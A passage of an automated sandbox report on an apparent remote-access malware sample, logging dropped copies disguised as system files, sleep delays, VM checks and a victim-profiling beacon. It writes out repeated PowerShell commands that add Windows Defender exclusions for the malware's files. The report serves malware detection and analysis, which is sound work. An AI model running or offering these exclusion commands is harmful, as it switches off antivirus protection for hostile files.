Source: C:\Recovery\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SearchApp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SearchApp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SearchApp.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599859
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599695
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599533
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599328
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599165
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599037
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 598750
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 598195
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 598000
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477

Source: kQyd2z80gD.exe, 00000000.00000002.2139971469.000000001B72E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\`
Source: kQyd2z80gD.exe, 00000000.00000002.2151189015.000000001B88E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3613139027.000000001B6D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Process token adjusted: Debug
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Process token adjusted: Debug
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Process token adjusted: Debug
Source: C:\Recovery\SearchApp.exe	Process token adjusted: Debug
Source: C:\Recovery\SearchApp.exe	Process token adjusted: Debug
Source: C:\Recovery\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Recovery\WmiPrvSE.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe'
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe'
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WmiPrvSE.exe'
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SearchApp.exe'
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WmiPrvSE.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SearchApp.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WmiPrvSE.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SearchApp.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"	Jump to behavior

Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002872000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002764000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000026C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002872000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002764000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000026C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ica/Chicago"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002872000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002764000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000026C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"040965","UserName":"user","IpInfo":{"ip":"173.254.250.71","city":"Killeen","region":"Texas","country":"US","loc":"31.0065,-97.8406","org":"Not specified - United States","postal":"000000","timezone":"America/Chicago"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}H;%
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002872000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002764000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000026C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"040965","UserName":"user","IpInfo":{"ip":"173.254.250.71","city":"Killeen","region":"Texas","country":"US","loc":"31.0065,-97.8406","org":"Not specified - United States","postal":"000000","timezone":"America/Chicago"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Queries volume information: C:\Users\user\Desktop\kQyd2z80gD.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
